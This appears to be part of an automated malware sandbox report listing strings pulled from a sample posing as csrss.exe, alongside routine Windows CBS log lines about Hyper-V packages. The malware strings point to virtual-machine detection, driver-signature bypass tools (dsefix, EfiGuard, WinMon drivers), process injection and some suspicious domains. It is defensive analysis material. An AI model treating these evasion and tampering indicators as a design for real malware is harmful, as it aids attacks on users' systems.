        Source: csrss.exe, 0000000B.00000002.561114927.0000000000401000.00000040.00020000.sdmpBinary or memory string: Value is nullVirtualUnlockWINDOW_UPDATEWTSFreeMemoryWriteConsoleW[FrameHeader \\.\VBoxGuestaccept-rangesaccess deniedadvapi32.dll
        Source: CBS.log.7.drBinary or memory string: 2019-06-27 00:55:58, Info CBS Plan: Package: Microsoft-Hyper-V-Offline-Core-Group-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: eab40d924d8b5549872893de549370fa, current: Staged, pending: Default, start: Staged, applicable: Installed, targeted: Staged, limit: Staged, selected: Default
        Source: CBS.log.7.drBinary or memory string: 2019-06-27 00:55:58, Info CBS Appl: Evaluating package applicability for package HyperV-Compute-System-VirtualMachine-Package~31bf3856ad364e35~amd64~~10.0.17134.1, applicable state: Installed
        Source: CBS.log.7.drBinary or memory string: 2019-06-27 00:56:56, Info CBS Exec: Package: Microsoft-Hyper-V-Offline-Core-Group-servercommon-Package~31bf3856ad364e35~amd64~~10.0.17134.1 is already in the correct state, current: Staged, targeted: Staged
        Source: csrss.exe, 0000000B.00000002.561114927.0000000000401000.00000040.00020000.sdmpBinary or memory string: ... omitting accept-charsetafter EfiGuardallocfreetracebad RST markerbad allocCountbad record MACbad span statebad stack sizebtc.usebsv.comcert installedchecksum errorcontent-lengthcouldn't patchdata truncateddistributor_iddriver removedexit status -1file too largefinalizer waitgcstoptheworldgetprotobynamegot system PIDinitial serverinternal errorinvalid syntaxis a directorykey size wronglevel 2 haltedlevel 3 haltedlookup TXT: %wmemprofilerateneed more datanil elem type!no module datano such deviceparse cert: %wprotocol errorread certs: %wreport_id is 0runtime: base=runtime: full=s.allocCount= semaRoot queueserver.versionstack overflowstopm spinningstore64 failedsync.Cond.Waittext file busytimeEndPeriodtoo many linkstoo many usersunexpected EOFunknown code: unknown error unknown markerunknown methodunknown mode: unreachable: unsafe.Pointervirtualbox: %wvmwaretray.exevmwareuser.exewii libnup/1.0winapi error #work.full != 0x509ignoreCN=1xenservice.exezero parameter with GC prog
        Source: CBS.log.7.drBinary or memory string: 2019-06-27 00:55:58, Info CBS Appl: detect Parent, Package: Microsoft-Hyper-V-ClientEdition-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Parent: Microsoft-Windows-Foundation-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Disposition = Detect, VersionComp: EQ, BuildComp: EQ, RevisionComp: EQ, Exist: present
        Source: CBS.log.7.drBinary or memory string: 2019-06-27 00:55:58, Info CBS Plan: Package: HyperV-Compute-System-VirtualMachine-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: 1a8a1b3524f6b9bff288f49da85c14f6, current: Staged, pending: Default, start: Staged, applicable: Installed, targeted: Staged, limit: Staged, selected: Default
        Source: csrss.exe, 0000000B.00000002.561114927.0000000000401000.00000040.00020000.sdmpBinary or memory string: acceptactiveautumnbitterbreezebrokenchan<-cherryclosedcookiedivinedomaindwarf.efenceempty exec: expectfloralflowerforestfrostygopherhangupheaderhiddenip+netkilledlistenlittlelivelymeadowminutenumberobjectpopcntpurplereadatreasonremoverenamerun-v3rune1 sc.binscvg: secondsecureselectsendtoservershadowsilentsocketsocks socks5springstatusstringstructsummersunsetsweep telnetuint16uint32uint64unusedvioletvmhgfsvmxnetvpc-s3winterwup_hsxennetxensvcxenvdb %v=%v, (conn) (scan (scan) MB in Value> dying= flags= len=%d locks= m->g0= nmsys= s=nil
        Source: csrss.exeBinary or memory string: rayUnlockSetCommTimeoutsSetSecurityInfoSetVolumeLabelWShellExecuteExWStringFromCLSIDStringFromGUID2TerminateThreadUninstallStringUnmapViewOfFileVBoxService.exeVPS.hsmiths.comWinsta0\DefaultX-Forwarded-For\\.\VBoxTrayIPC] morebuf={pc:accept-encodingaccept-lang
        Source: CBS.log.7.drBinary or memory string: 2019-06-27 00:55:58, Info CBS Appl: Evaluating package applicability for package Microsoft-Hyper-V-Hypervisor-onecore-Package~31bf3856ad364e35~amd64~~10.0.17134.1, applicable state: Installed
        Source: CBS.log.7.drBinary or memory string: 2019-06-27 00:56:56, Info CBS Exec: Package: Microsoft-Hyper-V-Online-Services-vm-Package~31bf3856ad364e35~amd64~~10.0.17134.1 is already in the correct state, current: Staged, targeted: Staged
        Source: CBS.log.7.drBinary or memory string: 2019-06-27 00:55:57, Info CBS Update: Setting Install State, Package: Microsoft-Hyper-V-ClientEdition-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: Microsoft-Hyper-V-All, new state: Off
        Source: CBS.log.7.drBinary or memory string: 2019-06-27 00:55:58, Info CBS Plan: Package: Microsoft-Hyper-V-ClientEdition-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: Microsoft-Hyper-V-Hypervisor, current: Staged, pending: Default, start: Staged, applicable: Staged, targeted: Staged, limit: Installed, selected: Off
        Source: CBS.log.7.drBinary or memory string: 2019-06-27 00:55:58, Info CBS Plan: Package: HyperV-Compute-System-VirtualMachine-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: 02124bd8d86f6990d0675e6c392d9200, current: Staged, pending: Default, start: Staged, applicable: Installed, targeted: Staged, limit: Staged, selected: Default
        Source: CBS.log.7.drBinary or memory string: 2019-06-27 00:57:09, Info CBS Appl: Package: Microsoft-Hyper-V-ClientEdition-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: Microsoft-Hyper-V-Hypervisor, Applicable: NeedsParent, Disposition: Staged
        Source: csrss.exe, 0000000B.00000002.561114927.0000000000401000.00000040.00020000.sdmpBinary or memory string: IP addressIsValidSidKeep-AliveKharoshthiLocalAllocLockFileExLogonUserWManichaeanMessage-IdNo ContentOld_ItalicOld_PermicOld_TurkicOpenEventWOpenMutexWOpenThreadOther_MathPOSTALCODEParseFloatPhoenicianProcessingPulseEventRST_STREAMResetEventSHA256-RSASHA384-RSASHA512-RSASYSTEMROOTSaurashtraSecureBootSet-CookieUser-AgentVMSrvc.exeVT_ILLEGALWSACleanupWSASocketWWSAStartupWget/1.9.1Windows 10[:^alnum:][:^alpha:][:^ascii:][:^blank:][:^cntrl:][:^digit:][:^graph:][:^lower:][:^print:][:^punct:][:^space:][:^upper:][:xdigit:]\\.\WinMon\patch.exe^{[\w-]+}$app_%d.txtatomicand8casgstatuscmd is nilcomplex128connectiondnsapi.dlldsefix.exedwarf.Attre.keff.orgexitThreadexp mastergetsockoptgoroutine http_proxyimage/jpegimage/webpinvalidptrkeep-alivemSpanInUseno resultsnot a boolnot signedowner diedprl_cc.exeres binderres masterresumptionrune <nil>runtime: gschedtracesemacquireset-cookiesetsockoptsocks bindterminatedtracefree(tracegc()
        Source: CBS.log.7.drBinary or memory string: 2019-06-27 00:55:58, Info CBS Appl: Evaluating package applicability for package HyperV-Compute-System-VirtualMachine-vm-Package~31bf3856ad364e35~amd64~~10.0.17134.1, applicable state: Installed
        Source: csrss.exe, 0000000B.00000002.561114927.0000000000401000.00000040.00020000.sdmpBinary or memory string: RTP.exeSYSTEMROOT=SetFileTimeSignWritingSoft_DottedSystemDriveTESTING KEYTTL expiredVBoxServiceVMUSrvc.exeVT_RESERVEDVariantInitVirtualFreeVirtualLockWSARecvFromWarang_CitiWhite_SpaceWinDefender[:^xdigit:]\dsefix.exealarm clockapplicationbad addressbad messagebad timedivbitcoins.skbroken pipecampaign_idcgocall nilclobberfreeclosesocketcombase.dllcompaign_idcreated by crypt32.dlldnsmessage.e2.keff.orgembedded/%sfile existsfinal tokenfloat32nan2float64nan2float64nan3gccheckmarkgeneralizedget CDN: %wgetpeernamegetsocknamehttps_proxyi/o timeoutlocal errorlost mcachemSpanManualmethodargs(mswsock.dllnext servernil contextorannis.comparse errorprocess: %sraw-controlreflect.Setretry-afterruntime: P runtime: p scheddetailsechost.dllsecur32.dllservice: %sshell32.dllshort writetaskmgr.exetls: alert(tracealloc(traffic updunreachableuserenv.dllversion=183wininet.dllwup_process (sensitive) [recovered] allocCount found at *( gcscandone m->gsignal= minTrigger= nDataRoots= nSpanRoots= pages/byte
        Source: CBS.log.7.drBinary or memory string: 2019-06-27 00:55:58, Info CBS Plan: Package: Microsoft-Hyper-V-Offline-Core-Group-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: 762e99ca5a85803eb16880bf94ac8a17, current: Staged, pending: Default, start: Staged, applicable: Installed, targeted: Staged, limit: Staged, selected: Default
        Source: CBS.log.7.drBinary or memory string: 2019-06-27 00:56:56, Info CBS Exec: Package: Microsoft-Hyper-V-ClientEdition-Package~31bf3856ad364e35~amd64~~10.0.17134.1 is already in the correct state, current: Installed, targeted: Installed
        Source: CBS.log.7.drBinary or memory string: 2019-06-27 00:55:58, Info CBS Plan: Package: Microsoft-Hyper-V-ClientEdition-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: HyperV-Networking-Containers-Package, current: Staged, pending: Default, start: Staged, applicable: Staged, targeted: Staged, limit: Installed, selected: Default
        Source: CBS.log.7.drBinary or memory string: 2019-06-27 00:55:58, Info CBS Plan: Package: Microsoft-Hyper-V-ClientEdition-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: Microsoft-Hyper-V, current: Staged, pending: Default, start: Staged, applicable: Staged, targeted: Staged, limit: Installed, selected: Off
        Source: CBS.log.7.drBinary or memory string: 2019-06-27 00:55:54, Info CBS Appl: Package: Microsoft-Hyper-V-ClientEdition-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: Microsoft-Hyper-V, Applicable: NeedsParent, Disposition: Staged
        Source: CBS.log.7.drBinary or memory string: 2019-06-27 00:55:58, Info CBS Plan: Package: HyperV-Compute-System-VirtualMachine-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: 7c41348249711e2c2834f1d280a7daaa, current: Staged, pending: Default, start: Staged, applicable: Installed, targeted: Staged, limit: Staged, selected: Default
        Source: CBS.log.7.drBinary or memory string: 2019-06-27 00:56:56, Info CBS Exec: Skipping Package: Microsoft-Hyper-V-Offline-Core-Group-vm-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: 7af75ecf5d4e3ae499f64704cca67740 because it is already in the correct state.
        Source: CBS.log.7.drBinary or memory string: 2019-06-27 00:55:57, Info CBS Update: Setting Install State, Package: Microsoft-Hyper-V-ClientEdition-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: Microsoft-Hyper-V-Management-PowerShell, new state: Off
        Source: CBS.log.7.drBinary or memory string: 2019-06-27 00:55:58, Info CBS Plan: Package: Microsoft-Hyper-V-Offline-Core-Group-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: 27a952ddb20b8a44c2d225c36c4b0274, current: Staged, pending: Default, start: Staged, applicable: Installed, targeted: Staged, limit: Staged, selected: Default
        Source: CBS.log.7.drBinary or memory string: 2019-06-27 00:56:56, Info CBS Exec: Package: Microsoft-Hyper-V-Package-base-onecore-Package~31bf3856ad364e35~amd64~~10.0.17134.1 is already in the correct state, current: Staged, targeted: Staged
        Source: CBS.log.7.drBinary or memory string: 2019-06-27 00:55:58, Info CBS Plan: Package: Microsoft-Hyper-V-Offline-Core-Group-onecore-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: 8381c0f3cdb917a83d773f922f3b5250, current: Staged, pending: Default, start: Staged, applicable: Installed, targeted: Staged, limit: Staged, selected: Default
        Source: CBS.log.7.drBinary or memory string: 2019-06-27 00:55:58, Info CBS Plan: Package: Microsoft-Hyper-V-Offline-Core-Group-servercommon-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: 8c028159d1d14a93f99d8c89b6f63e99, current: Staged, pending: Default, start: Staged, applicable: Installed, targeted: Staged, limit: Staged, selected: Default
        Source: CBS.log.7.drBinary or memory string: 2019-06-27 00:55:54, Info CBS Appl: DetectUpdate, Package: Microsoft-Hyper-V-ClientEdition-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Local Parent: Microsoft-Hyper-V-All, Intended State: Staged
        Source: CBS.log.7.drBinary or memory string: 2019-06-27 00:55:58, Info CBS Plan: Package: HyperV-Compute-System-VirtualMachine-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: cead152c266254f49dbb9b3d3e33f6ed, current: Staged, pending: Default, start: Staged, applicable: Installed, targeted: Staged, limit: Staged, selected: Default
        Source: CBS.log.7.drBinary or memory string: 2019-06-27 00:55:57, Info CBS Update: Setting Install State, Package: Microsoft-Hyper-V-ClientEdition-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: Microsoft-Hyper-V-All, current State: Default, new state: Off, RemovePayload: 0
        Source: CBS.log.7.drBinary or memory string: 2019-06-27 00:55:58, Info CBS Plan: Package: Microsoft-Hyper-V-ClientEdition-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: Microsoft-Hyper-V-Management-PowerShell, current: Staged, pending: Default, start: Staged, applicable: Staged, targeted: Staged, limit: Installed, selected: Off
        Source: CBS.log.7.drBinary or memory string: 2019-06-27 00:55:58, Info CBS Appl: DetectUpdate, Package: Microsoft-Windows-PAW-Feature-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Remote Parent: Microsoft-Hyper-V, Intended State: Staged
        Source: CBS.log.7.drBinary or memory string: 2019-06-27 00:55:58, Info CBS Plan: Package: Microsoft-Hyper-V-Online-Services-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: 36f6d4975967228db5be330358a79c61, current: Staged, pending: Default, start: Staged, applicable: Installed, targeted: Staged, limit: Staged, selected: Default
        Source: CBS.log.7.drBinary or memory string: 2019-06-27 00:55:58, Info CBS Plan: Package: HyperV-Compute-System-VirtualMachine-vm-Package~31bf3856ad364e35~amd64~~10.0.17134.1, current: Staged, pending: Default, start: Staged, applicable: Installed, targeted: Staged, limit: Staged
        Source: CBS.log.7.drBinary or memory string: 2019-06-27 00:55:58, Info CBS Plan: Package: HyperV-Compute-System-VirtualMachine-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: 27a952ddb20b8a44c2d225c36c4b0274, current: Staged, pending: Default, start: Staged, applicable: Installed, targeted: Staged, limit: Staged, selected: Default
        Source: CBS.log.7.drBinary or memory string: 2019-06-27 00:55:57, Info CBS Update: Setting Install State, Package: Microsoft-Hyper-V-ClientEdition-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: Microsoft-Hyper-V, current State: Default, new state: Off, RemovePayload: 0
        Source: CBS.log.7.drBinary or memory string: 2019-06-27 00:55:58, Info CBS Plan: Package: Microsoft-Hyper-V-Offline-Core-Group-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: 374c9d21846cca7a5951fd26665cb73b, current: Staged, pending: Default, start: Staged, applicable: Installed, targeted: Staged, limit: Staged, selected: Default
        Source: CBS.log.7.drBinary or memory string: 2019-06-27 00:55:58, Info CBS Plan: Package: HyperV-Compute-System-VirtualMachine-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: f161f1daec93b6f9633ae86b222e7d6b, current: Staged, pending: Default, start: Staged, applicable: Installed, targeted: Staged, limit: Staged, selected: Default
        Source: upd.exe, csrss.exeBinary or memory string: EndOfFileSetErrorModeSetStdHandleSora_SompengSyloti_NagriSysStringLenThread32NextTransitionalTransmitFileUnauthorizedUnlockFileExVBoxTray.exeVariantClearVirtualAllocVirtualQueryWinmon32.sysWinmon64.sysWintrust.dllX-ImforwardsX-Powered-By[[:^ascii:]]\/(\d+)-(.*
        Source: upd.exe, csrss.exeBinary or memory string: llocStringLenToo Many RequestsTransfer-EncodingUnified_IdeographVGAuthService.exeWSAEnumProtocolsWWTSQueryUserTokenWrite after CloseX-Idempotency-Key\System32\drivers\\.\VBoxMiniRdrDNbad TinySizeClasscouldn't dial: %wcouldn't find pidcouldn't get UUIDcouldn't
        Source: CBS.log.7.drBinary or memory string: 2019-06-27 00:55:58, Info CBS Plan: Package: Microsoft-Hyper-V-Online-Services-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: 9c32724c11c2062b0cd209906baed874, current: Staged, pending: Default, start: Staged, applicable: Installed, targeted: Staged, limit: Staged, selected: Default
        Source: CBS.log.7.drBinary or memory string: 2019-06-27 00:55:58, Info CBS Plan: Package: HyperV-Compute-System-VirtualMachine-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: 89b6e9bbb8d4e09208a54048cb490ab6, current: Staged, pending: Default, start: Staged, applicable: Installed, targeted: Staged, limit: Staged, selected: Default
        Source: CBS.log.7.drBinary or memory string: 2019-06-27 00:55:58, Info CBS Appl: Evaluating package applicability for package Microsoft-Hyper-V-Package-base-onecore-Package~31bf3856ad364e35~amd64~~10.0.17134.1, applicable state: Installed
        Source: CBS.log.7.drBinary or memory string: 2019-06-27 00:55:58, Info CBS Appl: DetectUpdate, Package: Microsoft-Windows-PAW-Feature-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Remote Parent: Microsoft-Hyper-V-Hypervisor, Intended State: Staged
        Source: csrss.exe, 0000000B.00000002.561114927.0000000000401000.00000040.00020000.sdmpBinary or memory string: m=] n=agedarchasn1avx2basebindbirdbluebmi1bmi2boldboolbushcallcap cas1cas2cas3cas4cas5cas6chancoldcooldampdarkdatadatedawndeaddialdustermsetagfailfilefirefrogfromftpsfuncgziphazehillholyhosthourhttpicmpidleigmpint8jpegjsonkindlakelateleaflinklongmoonnonenullopenpathpinepipepondpop3quitrainreadsbrkseeksid=smtpsnowsse2sse3starsurftag:tcp4tcp6texttreetruetypeudp6uintunixuuidvaryvmciwavewildwindwoodxn-- -%s ...
        Source: CBS.log.7.drBinary or memory string: 2019-06-27 00:56:55, Info CBS Exec: Package: Microsoft-Hyper-V-Hypervisor-Package~31bf3856ad364e35~amd64~~10.0.17134.1 is already in the correct state, current: Staged, targeted: Staged
        Source: CBS.log.7.drBinary or memory string: 2019-06-27 00:55:58, Info CBS Plan: Package: Microsoft-Hyper-V-ClientEdition-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: Microsoft-Hyper-V-Management-Clients-62, current: Staged, pending: Default, start: Staged, applicable: Staged, targeted: Staged, limit: Installed, selected: Default
        Source: CBS.log.7.drBinary or memory string: 2019-06-27 00:57:09, Info CBS Appl: DetectUpdate, Package: Microsoft-Windows-PAW-Feature-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Remote Parent: Microsoft-Hyper-V-Services, Intended State: Staged
        Source: CBS.log.7.drBinary or memory string: 2019-06-27 00:55:58, Info CBS Plan: Package: Microsoft-Hyper-V-Hypervisor-onecore-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: 350d2f419bdddcb6a98b096b17a5e4ec, current: Staged, pending: Default, start: Staged, applicable: Installed, targeted: Staged, limit: Staged, selected: Default
        Source: CBS.log.7.drBinary or memory string: 2019-06-27 00:56:56, Info CBS Exec: Skipping Package: Microsoft-Hyper-V-Offline-Common-vm-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: 1007f7901cdcdcd84e1638c6732a7565 because it is already in the correct state.
        Source: CBS.log.7.drBinary or memory string: 2019-06-27 00:55:57, Info CBS Update: Setting Install State, Package: Microsoft-Hyper-V-ClientEdition-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: Microsoft-Hyper-V-Hypervisor, new state: Off
        Source: csrss.exeBinary or memory string: too many linkstoo many usersunexpected EOFunknown code: unknown error unknown markerunknown methodunknown mode: unreachable: unsafe.Pointervirtualbox: %wvmwaretray.exevmwareuser.exewii libnup/1.0winapi error #work.full != 0x509ignoreCN=1xenservice.exezero par
        Source: CBS.log.7.drBinary or memory string: 2019-06-27 00:57:09, Info CBS Appl: Package: Microsoft-Hyper-V-ClientEdition-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: Microsoft-Hyper-V, Applicable: NeedsParent, Disposition: Staged
        Source: csrss.exeBinary or memory string: ionPalmyreneParseUintPatchTimePublisherReleaseDCRemoveAllSamaritanSee OtherSeptemberSundaneseSysnativeToo EarlyTrailer: TypeCNAMETypeHINFOTypeMINFOUse ProxyVBoxGuestVBoxMouseWSASendToWednesdayWindows 7WriteFileZ07:00:00[%v = %d][:^word:][:alnum:][:alpha:][:asc
        Source: CBS.log.7.drBinary or memory string: 2019-06-27 00:55:58, Info CBS Plan: Package: HyperV-Compute-System-VirtualMachine-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: 54471d62ed5a517374d13bdd02cd715e, current: Staged, pending: Default, start: Staged, applicable: Installed, targeted: Staged, limit: Staged, selected: Default
        Source: CBS.log.7.drBinary or memory string: 2019-06-27 00:55:58, Info CBS Plan: Package: Microsoft-Hyper-V-Services-Package~31bf3856ad364e35~amd64~~10.0.17134.1, current: Staged, pending: Default, start: Staged, applicable: Installed, targeted: Staged, limit: Staged
        Source: CBS.log.7.drBinary or memory string: 2019-06-27 00:55:54, Info CBS Appl: Package: Microsoft-Hyper-V-ClientEdition-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: Microsoft-Hyper-V-Tools-All, Applicable: NeedsParent, Disposition: Staged
        Source: CBS.log.7.drBinary or memory string: 2019-06-27 00:57:09, Info CBS Appl: Package: Microsoft-Hyper-V-ClientEdition-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: Microsoft-Hyper-V-Services, Applicable: NeedsParent, Disposition: Staged
        Source: CBS.log.7.drBinary or memory string: 2019-06-27 00:55:58, Info CBS Plan: Package: Microsoft-Hyper-V-Offline-Common-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: b53b41e2e1c4409bda9e9a54b7b3b422, current: Staged, pending: Default, start: Staged, applicable: Installed, targeted: Staged, limit: Staged, selected: Default
        Source: CBS.log.7.drBinary or memory string: 2019-06-27 00:56:56, Info CBS Exec: Skipping Package: Microsoft-Hyper-V-Offline-Common-onecore-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: 878b2f9862ce158a90aa7b5c871b772e because it is already in the correct state.
        Source: CBS.log.7.drBinary or memory string: 2019-06-27 00:55:58, Info CBS Plan: Package: HyperV-Primitive-VirtualMachine-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: 9778903714986ba7c2a01fb00bd42436, current: Staged, pending: Default, start: Staged, applicable: Installed, targeted: Staged, limit: Staged, selected: Default
        Source: CBS.log.7.drBinary or memory string: 2019-06-27 00:55:58, Info CBS Plan: Package: Microsoft-Hyper-V-Offline-Common-vm-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: 1007f7901cdcdcd84e1638c6732a7565, current: Staged, pending: Default, start: Staged, applicable: Installed, targeted: Staged, limit: Staged, selected: Default
        Source: CBS.log.7.drBinary or memory string: 2019-06-27 00:55:57, Info CBS Update: Setting Install State, Package: Microsoft-Hyper-V-ClientEdition-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: Microsoft-Hyper-V-Management-Clients, current State: Default, new state: Off, RemovePayload: 0
        Source: CBS.log.7.drBinary or memory string: 2019-06-27 00:55:58, Info CBS Appl: Evaluating package applicability for package Microsoft-Hyper-V-Offline-Core-Group-vm-Package~31bf3856ad364e35~amd64~~10.0.17134.1, applicable state: Installed
        Source: CBS.log.7.drBinary or memory string: 2019-06-27 00:55:58, Info CBS Plan: Package: HyperV-Compute-System-VirtualMachine-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: 101afe1e2ee3fa31a2c2b78c5d9a5aaf, current: Staged, pending: Default, start: Staged, applicable: Installed, targeted: Staged, limit: Staged, selected: Default
        Source: CBS.log.7.drBinary or memory string: 2019-06-27 00:57:09, Info CBS Appl: DetectUpdate, Package: Microsoft-Windows-PAW-Feature-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Remote Parent: Microsoft-Hyper-V-Hypervisor, Intended State: Staged
        Source: CBS.log.7.drBinary or memory string: 2019-06-27 00:56:42, Info CBS Appl: Package: Microsoft-Hyper-V-ClientEdition-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: Microsoft-Hyper-V, Applicable: NeedsParent, Disposition: Staged
        Source: CBS.log.7.drBinary or memory string: 2019-06-27 00:57:09, Info CBS Appl: DetectUpdate, Package: Microsoft-Hyper-V-ClientEdition-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Local Parent: Microsoft-Hyper-V, Intended State: Staged
        Source: upd.exe.0.drBinary or memory string: dvdyvmci
        Source: csrss.exe, 0000000B.00000002.561114927.0000000000401000.00000040.00020000.sdmpBinary or memory string: H_T= H_a= H_g= MB, W_a= and h_a= h_g= h_t= max= ptr siz= tab= top= u_a= u_g=%s %q%s*%d%s/%s%s:%d%s=%s%v-%v&#34;&#39;&amp;+0330+0430+0530+0545+0630+0845+1030+1245+1345, ..., fp:-0930.html.jpeg.wasm.webp156253.2.2500015000250003500045000550006560015600278125:***@:path<nil>AdlamAprilAttr(BamumBatakBuhidCall CountDograECDSAErrorFlagsFoundGetDCGreekHTTP/KhmerLatinLimbuLocalLstatMarchNushuOghamOriyaOsageP-224P-256P-384P-521PGDSERangeRealmRunicSTermTakriTamilTypeAUUID=\u202allowarraybad nblackbrookchdirclosecloudcsrssdreamemptyfalsefaultfieldfloatfrostgcinggladegrassgreenhttpsimap2imap3imapsint16int32int64matchmistymkdirmonthmuddynightntohspanicpaperparsepgdsepop3sproudquietrangeriverrmdirroughrouterune sdsetshapesleepslicesmallsmokesnowysockssoundsse41sse42ssse3stilltext/tls13tls: totaluint8usageuser=utf-8valuevmusbvmx86voicewaterwhitewispywriteyoung (MB)
        Source: CBS.log.7.drBinary or memory string: 2019-06-27 00:56:56, Info CBS Exec: Package: HyperV-Compute-System-VirtualMachine-vm-Package~31bf3856ad364e35~amd64~~10.0.17134.1 is already in the correct state, current: Staged, targeted: Staged
        Source: CBS.log.7.drBinary or memory string: 2019-06-27 00:55:58, Info CBS Appl: Evaluating package applicability for package Microsoft-Hyper-V-Online-Services-vm-Package~31bf3856ad364e35~amd64~~10.0.17134.1, applicable state: Installed
        Source: CBS.log.7.drBinary or memory string: 2019-06-27 00:55:58, Info CBS Appl: DetectUpdate, Package: Microsoft-Hyper-V-ClientEdition-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Local Parent: Microsoft-Hyper-V-Management-Clients, Intended State: Staged
        Source: csrss.exeBinary or memory string: main.isRunningInsideVMWare
        Source: csrss.exe, 0000000B.00000002.561114927.0000000000401000.00000040.00020000.sdmpBinary or memory string: entersyscallexit status found av: %sgcpacertracegetaddrinfowgot TI tokenguid_machinehost is downhttp2debug=1http2debug=2illegal seekinjector.exeinstall_dateinvalid baseinvalid portinvalid slotiphlpapi.dllkernel32.dllmachine_guidmadvdontneedmax-forwardsnetapi32.dllno such hostnon-existentnot pollableoleaut32.dllout of rangeparse PE: %wpointtopointproxyconnectreflect.Copyreleasep: m=remote errorruntime: f= runtime: gp=s ap traffics hs trafficshort buffersignature.%stransmitfileulrichard.chunexpected )unknown portunknown typevmacthlp.exevmtoolsd.exewatchdog.exewinlogon.exewintrust.dllwirep: p->m=wtsapi32.dll != sweepgen (default %q) (default %v) MB released
        Source: CBS.log.7.drBinary or memory string: 2019-06-27 00:55:58, Info CBS Plan: Package: Microsoft-Hyper-V-ClientEdition-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: Microsoft-Onecore-SPP-VirtualDevice, current: Staged, pending: Default, start: Staged, applicable: Staged, targeted: Staged, limit: Installed, selected: Default
        Source: CBS.log.7.drBinary or memory string: 2019-06-27 00:55:58, Info CBS Plan: Package: Microsoft-Hyper-V-Offline-Common-Package~31bf3856ad364e35~amd64~~10.0.17134.1, current: Staged, pending: Default, start: Staged, applicable: Installed, targeted: Staged, limit: Staged
        Source: CBS.log.7.drBinary or memory string: 2019-06-27 00:55:58, Info CBS Plan: Package: Microsoft-Hyper-V-Hypervisor-onecore-Package~31bf3856ad364e35~amd64~~10.0.17134.1, current: Staged, pending: Default, start: Staged, applicable: Installed, targeted: Staged, limit: Staged
        Source: CBS.log.7.drBinary or memory string: 2019-06-27 00:55:58, Info CBS Plan: Package: Microsoft-Hyper-V-Offline-Core-Group-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: 268bf92397d59ed4327a8ab865bfc689, current: Staged, pending: Default, start: Staged, applicable: Installed, targeted: Staged, limit: Staged, selected: Default
        Source: CBS.log.7.drBinary or memory string: 2019-06-27 00:55:58, Info CBS Appl: Evaluating package applicability for package Microsoft-Hyper-V-Services-Package~31bf3856ad364e35~amd64~~10.0.17134.1, applicable state: Installed
        Source: CBS.log.7.drBinary or memory string: 2019-06-27 00:55:58, Info CBS Appl: Evaluating package applicability for package HyperV-Compute-System-VirtualMachine-onecore-Package~31bf3856ad364e35~amd64~~10.0.17134.1, applicable state: Installed
        Source: CBS.log.7.drBinary or memory string: 2019-06-27 00:55:58, Info CBS Plan: Package: Microsoft-Hyper-V-Hypervisor-Package~31bf3856ad364e35~amd64~~10.0.17134.1, current: Staged, pending: Default, start: Staged, applicable: Installed, targeted: Staged, limit: Staged
        Source: csrss.exeBinary or memory string: uetypeudp6uintunixuuidvaryvmciwavewildwindwoodxn-- -%s ... H_T= H_a= H_g= MB, W_a= and h_a= h_g= h_t= max= ptr siz= tab= top= u_a= u_g=%s %q%s*%d%s/%s%s:%d%s=%s%v-%v&#34;&#39;&amp;+0330+0430+0530+0545+0630+0845+1030+1245+1345, ..., fp:-0930.html.jpeg.wasm
        Source: csrss.exeBinary or memory string: tUsage of %s: Value is nullVirtualUnlockWINDOW_UPDATEWTSFreeMemoryWriteConsoleW[FrameHeader \\.\VBoxGuestaccept-rangesaccess deniedadvapi32.dll
        Source: CBS.log.7.drBinary or memory string: 2019-06-27 00:57:09, Info CBS Appl: Package: Microsoft-Hyper-V-ClientEdition-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: Microsoft-Hyper-V-Management-Clients, Applicable: NeedsParent, Disposition: Staged
